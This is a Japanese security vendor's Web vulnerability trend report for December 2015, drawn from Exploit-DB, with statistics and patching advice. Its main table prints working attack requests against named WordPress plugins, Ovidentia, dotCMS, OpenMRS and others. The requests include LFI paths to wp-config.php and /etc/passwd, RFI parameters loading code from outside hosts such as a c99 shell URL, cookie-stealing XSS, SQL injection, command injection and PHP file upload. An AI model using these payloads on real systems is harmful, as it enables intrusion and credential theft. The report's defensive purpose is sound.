1. 脆弱性別件数 脆弱性カテゴリ 件数 Command Injection 1 File Upload 1 Code Injection 2 RFI 5 SQL インジェクション (SQL Injection) 6 クロス サイト スクリプティング
(Cross Site Scripting : XSS) 9
LFI 13 合計 37 2. 危険度別件数 危険度 件数 割合 早急対応要 10 27% 高 27 73% 合計 37 100% 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 2 5% 中 3 8% 易 32 86% 合計 37 100% 4. 主なソフトウェア別脆弱性発生件数 件数 12 4 3 3 2 2 1 1 1 1 1 1 1 1 1 1 1 37 bitrix.mpbuilder Bitrix module
EDB-Report
最新Web脆弱性トレンドレポート(2015.12) 2015.12.01~2015.12.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 サマリー ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム ソフトウェア名 合計2015年12月に公開されたExploit-DBの分析結果、Local File Inclusion攻撃に対する脆弱性報告件数が最も多かったです。分析されたLocal File Inclusion攻撃は含めているファイルの内容を開けてみる簡単な脆弱性か ら特定命令を実行させる脆弱性まで攻撃難易度の側面では多様でしたが、危険度面では全て高い脆弱性でした。また、特定のアプリケーションと関連し、パラメータの値ではなく、パラメータキーを狙うLocal File Inclusion攻撃も発 見され、今回脆弱性が発見されたソフトウェアを使用する管理者は該当関連セキュリティパッチを実施したり、"../"と同じ文字列をフィルターしたり、エラーページ公開を禁じるなどの対応を実施して特定ファイルが露出されたり、実行にな らないように注意しなければなりません。主要ソフトウェア別脆弱性発生の現況を見ると、世界的に代表的なCMS Wordpressが最も多い脆弱性が報告されました。 使用者が多く、Pluginも多様に提供されるWordpressは、ハッ カーの主な攻撃対象となるため、脆弱性が発見されたPluginを使用する管理者は常に最新のアップデートを維持しなければなりません。 WordPress SIMOGEO FileManager PFSense iy10 Dizin Scripti
Ovidentia ArticleSetup ECommerceMajor PHP Utility Belt Zen Cart Zenphoto dotCMS Tequila Bigware OpenMRS Beezfud bitrix.xscan Bitrix module
1 1 2 5 6 9 13 0 2 4 6 8 10 12 14 Command Injection
File Upload Code Injection RFI SQL インジェク ション (SQL Injection) クロス サイト ス クリプティング (Cross Site Scripting : XSS) LFI
脆弱性別件数
10 27危険度別分類
早急対応要 高 2 3 32攻撃実行の難易度別件数
難 中 易 12 4 3 3 2 2 1 1 1 1 1 1 1 1 1 1 1主なソフトウェア別脆弱性発生件数
WordPress Ovidentia dotCMS Tequila Bigware OpenMRS ECommerceMajor PHP Utility Belt Zen Cart Zenphoto ArticleSetup SIMOGEO FileManager PFSense iy10 Dizin Scripti BeezfudEDB-Report
最新Web脆弱性トレンドレポート(2015.12) 2015.12.01~2015.12.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 中:情報漏洩 するため、高度な攻撃コードを採用したパターン、知らされていない攻撃 コードを採用したパターンのいずれかに該当する ** 5件以上発生した主なソフトウェア別脆弱性の詳細情報 EDB 番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 ソフトウェア名38861 RFI 易 高 WordPress Gwolle Guestbook Plugin 1.5.3 - ajaxresponse.php RFI 脆弱性 WordPress
38856 XSS 易 高 WordPress Users Ultra Plugin 1.5.50 - admin-ajax.php XSS 脆弱性 WordPress
38855 SQL Injection 易 高 WordPress Users Ultra Plugin 1.5.50 - admin-aja=
x.php SQL Injection 脆弱性 WordPress
38869 LFI 易 早急対応要 WordPress Plugin TheCartPress v1.4.7 - Miranda.class.php LFI 脆弱性 WordPress
38869 CommandInjection 中 早急対応要 WordPress Plugin TheCartPress v1.4.7 - Command injection 脆弱性 WordPress
38868 LFI 易 早急対応要 WordPress Plugin Sell Download v1.0.16 - sell-downloads.php Commandinjection 脆弱性 WordPress
38867 File Upload 易 高 WordPress Plugin Advanced uploader v2.10 - upload.php File Upload 脆弱性 WordPress
38867 LFI 易 早急対応要 WordPress Plugin Advanced uploader v2.10 - upload.php LFI 脆弱性 WordPress
38902 SQL Injection 難 早急対応要 WordPress Polls Widget Plugin 1.0.7 - admin-ajax.php SQL Injection 脆弱性 WordPress
38915 XSS 易 高 WordPress Plugin WP Easy Poll 1.1.3 - admin.php XSS 脆弱性 WordPress
38966 XSS 易 高 WordPress Admin Management Xtended Plugin 2.4.0 - admin-ajax.php XSS
脆弱性 WordPress
39133 SQL Injection 難 早急対応要 Simple Ads Manager 2.9.4.116 - sam-ajax-loader.php SQL Injection 脆弱性 WordPress
易:1回のリクエストで攻撃が成立するパターン、複数回トライするも、 攻撃実行難易度分類基準 既知の攻撃コードを採用したパターンのいずれかに該当する 中:攻撃手法自体は難しくないが、迂回コードを採用したパターン 早急対応要:攻撃が成功した場合システムへ侵入可 高:システム情報を取得するか、あるいはクライアントに2次被害を及ぼす 危険度分類基準 難:複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得
日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 2015-12-01 38841 LFI 易 高 Zenphoto 1.4.10 -pluginDoc.php LFI 脆弱性 /zenphoto-zenphoto-1.4.10/zp-core/pluginDoc.php?thirdparty=1&extension=../../../x ampp/phpinfo Zenphoto Zenphoto 1.4.10 2015-12-03 38861 RFI 易 高
WordPress Gwolle Guestbook Plugin 1.5.3 -ajaxresponse.php RFI 脆弱性 /wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http:// www.hacker.com/index.php WordPress WordPress Gwolle Guestbook Plugin 1.5.3 2015-12-03 38856 XSS 易 高
WordPress Users Ultra Plugin 1.5.50 - admin-ajax.php XSS 脆弱性
POST /wp-admin/admin-ajax.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 action=package_add_new&p_name=a<script>alert(1)</scr ipt> WordPress WordPress Users Ultra Plugin 1.5.50 2015-12-03 38855 SQL Injection 易 高
WordPress Users Ultra Plugin 1.5.50 - admin-aja= x.php SQL Injection 脆弱性
POST /wp-admin/admin-ajax.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=edit_video&video_id=1 and sleep(5)
WordPress
WordPress Users Ultra Plugin
1.5.50
2015-12-04 38869 LFI 易 早急対応要
WordPress Plugin TheCartPress v1.4.7 - Miranda.class.php LFI 脆弱性 /wp-content/plugins/thecartpress/modules/Miranda.class.p hp?page=../../../../../../../../wp-config.php%00 WordPress WordPress Plugin TheCartPress v1.4.7 2015-12-04 38869 Command Injection 中 早急対応要
WordPress Plugin TheCartPress v1.4.7 - Command injection 脆 弱性 /wp/admin-ajax.php?action=tcp_miranda_save_admin_panel&class=l s -al WordPress WordPress Plugin TheCartPress v1.4.7 2015-12-04 38868 LFI 易 早急対応要
WordPress Plugin Sell Download v1.0.16 - sell-downloads.php Command injection 脆弱性 /wp-content/plugins/sell-downloads/sell- downloads.php?file=../../../../../../../../.././wp-config.php%00 WordPress WordPress Plugin Sell Download v1.0.16 2015-12-04 38867 File Upload 易 高
WordPress Plugin Advanced uploader v2.10 - upload.php File Upload 脆弱性 POST /wp-content/plugins/advanced-uploader/upload.php HTTP/1.1 Host: Connection: Close
Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
Content-Type: multipart/form-data; boundary=---7dd10029908f2
---7dd10029908f2 Content-Disposition: form-data; name="file"; filename="@k3d.php" Content-Type: application/octet-stream <? phpinfo(); ?> ---7dd10029908f2--WordPress WordPress Plugin Advanced uploader v2.10 2015-12-04 38867 LFI 易 早急対応要
WordPress Plugin Advanced uploader v2.10 - upload.php LFI 脆弱性 /wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../. ./../../wp-config.php%00 WordPress WordPress Plugin Advanced uploader v2.10 2015-12-08 38906 XSS 易 상 dotCMS 3.2.4 -TagAjax.addTag.dwr XSS 脆弱性 POST /dwr/call/plaincall/TagAjax.addTag.dwr HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 c0-param0=<script>alert(1)<%2fscript> dotCMS dotCMS 3.2.4 2015-12-08 38906 XSS 易 早急対応要 dotCMS 3.2.4 -CategoryAjax.saveOrUpdateCate gory.dwr XSS 脆弱性 POST /dwr/call/plaincall/CategoryAjax.saveOrUpdateCategor y.dwr HTTP/1.1 Host: dotCMS dotCMS 3.2.4 2015-12-08 38906 XSS 易 早急対応要 dotCMS 3.2.4 -/c/portal/layout XSS 脆弱性 POST /c/portal/layout?p_l_id=a8e430e3-8010-40cf- ade1-5978e61241a8&p_p_id=EXT_LUCENE_TOOL&p_p_action=0& HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
dotCMS dotCMS 3.2.4
EDB-Report
最新Web脆弱性トレンドレポート(2015.12)
日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
EDB-Report
最新Web脆弱性トレンドレポート(2015.12)
2015.12.01~2015.12.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
2015-12-08 38902 SQL Injection 難 早急対応要
WordPress Polls Widget Plugin 1.0.7 - admin-ajax.php SQL Injection 脆弱性
POST
/wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
question_id=1337 union select
group_concat(0x7e,(select(@)from(select(@:=0x00),(se lect(@)from(information_schema.tables)where table_schema=database() and (@)in(@:=concat(@,0x3C62723E,table_name))))a)),2 -&poll_answer_securety=4ac4f387e2&date_answers[0]=5 WordPress WordPress Polls Widget Plugin 1.0.7
2015-12-08 38901 Code injection 中 高 PHP Utility Belt - ajax.php Code injection 脆弱性
POST /php-utility-belt/ajax.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
PHP Utility Belt PHP Utility Belt
2015-12-08 38899 LFI 易 高 OpenMRS 2.3 - viewPortlet.htm
LFI 脆弱性
/openmrs/module/reporting/viewPortlet.htm?id=reportD
esignPortlet&url=..%2f..%2f..%2fWEB- OpenMRS OpenMRS 2.3
2015-12-08 38898 XSS 易 高 OpenMRS 2.3
-cohortReport.form XSS 脆弱性
POST /openmrs/admin/reports/cohortReport.form HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 parentUUID=71dde2c8-60be-4171-9d3d-7 1293cdc4142&name="><script>alert(1)</scr ipt>&description="><script>alert(2)</scr ipt> OpenMRS OpenMRS 2.3
2015-12-08 38895 LFI 中 早急対応要 SIMOGEO FileManager 2.3.0
-filemanager.php LFI 脆弱性 /Filemanager/connectors/php/filemanager.php?mode=pre view&path=//....//....//....//....//....//....//.... //....//....//etc/passwd SIMOGEO FileManager SIMOGEO FileManager 2.3.0
2015-12-09 38915 XSS 易 高 WordPress Plugin WP Easy Poll
1.1.3 - admin.php XSS 脆弱性
POST
/wordpress/wp-admin/admin.php?page=easy_polls&action=add HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 p_ques=<script>alert(document.cookie)</script> WordPress WordPress Plugin WP Easy Poll 1.1.3
2015-12-10 38927 SQL Injection 易 高 iy10 Dizin Scripti - /admin
SQL Injection 脆弱性
POST /admin HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 id='or' 1=1&pw='or' 1=1 iy10 Dizin Scripti iy10 Dizin Scripti 2015-12-14 38976 LFI 易 高
Bitrix bitrix.xscan Module 1.0.3 -bitrix.xscan_worker.php LFI 脆弱性 /admin/bitrix.xscan_worker.php?action=prison&file=/u pload/main/77f/image.jpg../../../../../bitrix/.setti ngs.php bitrix.xscan Bitrix module bitrix.xscan Bitrix module 1.0.3 2015-12-14 38975 LFI 易 高 Bitrix bitrix.mpbuilder Module 1.0.10 -bitrix.mpbuilder_step2.php LFI 脆弱性 POST /bitrix/admin/bitrix.mpbuilder_step2.php?module_id=b log HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 save=1&work[/../../../../../../../../../../../../../ ../../../../../tmp/file]=1 bitrix.mpbuilder Bitrix module bitrix.mpbuilder Bitrix module 1.0.10 2015-12-14 38966 XSS 易 高
WordPress Admin Management Xtended Plugin 2.4.0 - admin-ajax.php XSS 脆弱性
POST /wp-admin/admin-ajax.php?action=ame_save_title HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 category_id=1&new_title=<script>alert(document.cooki e);</script> WordPress WordPress Admin Management Xtended Plugin 2.4.0 2015-12-14 38965 SQL Injection 易 高 ECommerceMajor -productdtl.php SQL Injection 脆弱性 /ecommercemajor/productdtl.php?prodid=1%20and%201=1-- ECommerceMajor ECommerceMajor
2015-12-15 38989 RFI 易 高 Ovidentia bulletindoc Module
2.9 - admin.php RFI 脆弱性 /bulletindoc-2-9/programs/admin.php?babInstallPath=http://www.hacke r.com/index.php Ovidentia Ovidentia bulletindoc Module 2.9 2015-12-15 38984 LFI 易 高 Tequila File Hosting 1.5 -download.php LFI 脆弱性 /tequila/download.php?filename=files/../../../../../etc/passwd&name=passwd Tequila Tequila FileHosting 1.5
2015-12-15 38984 XSS 易 高 Tequila File Hosting 1.5
-files.php XSS 脆弱性 /files.php?folder="><script>alert('Ehsan')</script> Tequila
Tequila File Hosting 1.5
2015-12-15 38984 XSS 易 高 Tequila File Hosting 1.5
-file.php XSS 脆弱性 /file.php?file="><script>alert('Ehsan')</script> Tequila
Tequila File Hosting 1.5
日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
EDB-Report
最新Web脆弱性トレンドレポート(2015.12)
2015.12.01~2015.12.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
2015-12-15 38981 RFI 易 高
Ovidentia absences Module 2.64 - planning.php RFI 脆弱 性 /absences-2-64/programs/planning.php?GLOBALS[babInstallPath]=htt p://www.hacker.com/index.php Ovidentia Ovidentia absences Module 2.64 2015-12-15 38990 SQL Injection 易 高
ArticleSetup Article Script 1.00 - article.php SQL Injection 脆弱性 /article.php?id=1%20and%201=1-- ArticleSetup ArticleSetup Article Script 1.00 2015-12-17 39017 LFI 易 高 Zen Cart 1.5.4 - ajax.php LFI脆弱性 /ajax.php?method=1&act=/../../../../tmp/file Zen Cart Zen Cart 1.5.4
2015-12-18 39038 LFI 易 高 PFSense <= 2.2.5 - wizard.php
LFI 脆弱性 /wizard.php?xml=../../../1.xml PFSense PFSense <= 2.2.5
2015-12-18 39034 RFI 易 高 Ovidentia maillist Module 4.0
- mlincl.php RFI 脆弱性 /maillist-4-0/programs/mlincl.php?GLOBALS[babInstallPath]=http:/ /yourshellpath.com/c99.txt Ovidentia Ovidentia maillist Module 4.0
2015-12-21 39068 RFI 易 高 Ovidentia online Module 2.8
-admin.php RFI 脆弱性
/online-2-8/programs/admin.php?GLOBALS[babAddonPhpPath]=http:/ /www.hacker.com/index.php
Ovidentia Ovidentia online Module 2.8 2015-12-23 39083 LFI 易 高 Bigware Shop 2.3.01 -main_bigware_12.php LFI 脆弱 性 /Bigware_Shop/modules/basic_pricing/configmain/main_ bigware_12.php?language=/../../../../index.php Bigware Bigware Shop 2.3.01 2015-12-23 39083 LFI 易 高 Bigware Shop 2.3.01 -main_bigware_115.php LFI 脆弱 性 /Bigware_Shop/modules/basic_pricing/configmain/main_ bigware_115.php?language=/../../../../index.php Bigware Bigware Shop 2.3.01 2015-12-24 39093 Code Injection 易 高 Beezfud - index.php Code
Injection 脆弱性
/beezfud/index.php?lookback=;echo%20%27<?php%20phpin
fo();%20?>%27%20>info.php; Beezfud Beezfud
2015-12-30 39133 SQL Injection 難 早急対応要
Simple Ads Manager 2.9.4.116 - sam-ajax-loader.php SQL Injection 脆弱性
POST /wp-content/plugins/simple-ads-manager/sam-ajax-loader.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 action=load_place&id=0&pid=1&wc=YTo0OntzOjI6IldDIjtz OjM6IjE9MCI7czozOiJXQ1QiO3M6MDoiIjtzOjM6IldDVyI7czox MTg6IikgVU5JT04gKFNFTEVDVCB1c2VyX3Bhc3MsIDEsIDIsIDMs IDQsIDUsIDYsIDcsIDgsIDksIDAsIDEsIDIsIDMsIDQsIDUsIDYs IDcsIDgsIDksIDAsIDEsIDIgRlJPTSB3cF91c2VycyBXSEVSRSBJ RCA9IDEiO3M6NDoiV0MyVyI7czowOiIiO30= WordPress WordPress Simple Ads Manager 2.9.4.116
